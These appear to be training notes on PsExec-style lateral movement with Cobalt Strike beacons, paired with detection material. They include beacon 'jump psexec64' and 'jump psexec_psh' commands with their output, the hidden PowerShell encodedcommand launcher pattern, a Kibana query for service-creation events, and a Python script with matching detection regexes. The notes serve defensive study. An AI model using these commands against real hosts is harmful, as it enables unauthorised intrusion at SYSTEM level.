PsExec

The psexec / psexec64 commands work by uploading a service binary to the target system, then creating and starting a Windows service to execute that binary. Beacons executed this way run as SYSTEM.

beacon> jump psexec64 web.dev.cyberbotic.io smb
[*] Tasked beacon to run windows/beacon_bind_pipe (\\.\pipe\TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10) on web via Service Control Manager (\\web\ADMIN$\768870c.exe)

Started service 768870c on web.dev.cyberbotic.io
[+] established link to child beacon: 10.10.122.30

A reliable way to hunt for PsExec is to look for 4697 (service created) events. These are usually quite rare, unless a service is installed as part of a software installation or something similar. Cobalt Strike generates a random 7-character alphanumeric string which it uses for both the service name and the binary filename. When setting the binPath for the service, it uses a UNC path to the ADMIN$ share.

event.code: 4697 and winlog.event_data.ServiceFileName: \\\\*\\ADMIN$\\*.exe

psexec_psh doesn't copy a binary to the target, but instead executes a PowerShell one-liner (always 32-bit). The pattern it uses by default is %COMSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand ....

beacon> jump psexec_psh web smb
[*] Tasked beacon to run windows/beacon_bind_pipe (\\.\pipe\TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10) on web via Service Control Manager (PSH)

Started service bd119dd on web
[+] established link to child beacon: 10.10.122.30
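The two detection patterns above (a service binary in ADMIN$ with a random 7-character name, and the psexec_psh %COMSPEC%/powershell one-liner) applied to a few constructed 4697 events, as an added example that is not part of the original notes. The field names follow the Kibana query on the page; the event records and the benign third-party service are made up for illustration.

```python
import re

# Constructed sample events in a flattened ECS-style shape (not real log lines).
SAMPLE_EVENTS = [
    {"event.code": "4697", "host.name": "web",
     "winlog.event_data.ServiceName": "768870c",
     "winlog.event_data.ServiceFileName": r"\\web\ADMIN$\768870c.exe"},
    {"event.code": "4697", "host.name": "web",
     "winlog.event_data.ServiceName": "bd119dd",
     "winlog.event_data.ServiceFileName":
         r"%COMSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand <base64 omitted>"},
    {"event.code": "4697", "host.name": "web",  # constructed benign installer service
     "winlog.event_data.ServiceName": "ExampleUpdater",
     "winlog.event_data.ServiceFileName": r'"C:\Program Files\ExampleVendor\updater.exe" /svc'},
    {"event.code": "7045", "host.name": "web",  # wrong event id, must be ignored
     "winlog.event_data.ServiceName": "768870c",
     "winlog.event_data.ServiceFileName": r"\\web\ADMIN$\768870c.exe"},
]

# Service binary referenced through a UNC path into ADMIN$ (same idea as the Kibana query).
ADMIN_SHARE_BINARY = re.compile(r"^\\\\[^\\]+\\ADMIN\$\\[^\\]+\.exe$", re.IGNORECASE)
# Cobalt Strike's default random 7-character alphanumeric service/file name.
CS_RANDOM_NAME = re.compile(r"^[a-z0-9]{7}$", re.IGNORECASE)
# Default psexec_psh launcher; the encoded payload after -encodedcommand is not needed to match.
PSH_ONELINER = re.compile(
    r"%COMSPEC%\s+/b\s+/c\s+start\s+/b\s+/min\s+powershell\s+-nop\s+-w\s+hidden\s+-encodedcommand",
    re.IGNORECASE)


def classify(event):
    """Return a verdict string for a suspicious 4697 event, or None if it looks benign."""
    if event.get("event.code") != "4697":
        return None
    path = event.get("winlog.event_data.ServiceFileName", "")
    name = event.get("winlog.event_data.ServiceName", "")
    if ADMIN_SHARE_BINARY.match(path):
        stem = path.rsplit("\\", 1)[-1][:-4]  # filename without ".exe"
        if CS_RANDOM_NAME.match(name) and stem == name:
            return "psexec (cobalt strike default naming)"
        return "psexec (binary in ADMIN$)"
    if PSH_ONELINER.search(path):
        return "psexec_psh"
    return None


def hunt(events):
    """Return (host, service name, verdict) for every event that matches a pattern."""
    hits = []
    for e in events:
        verdict = classify(e)
        if verdict:
            hits.append((e["host.name"], e["winlog.event_data.ServiceName"], verdict))
    return hits
```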
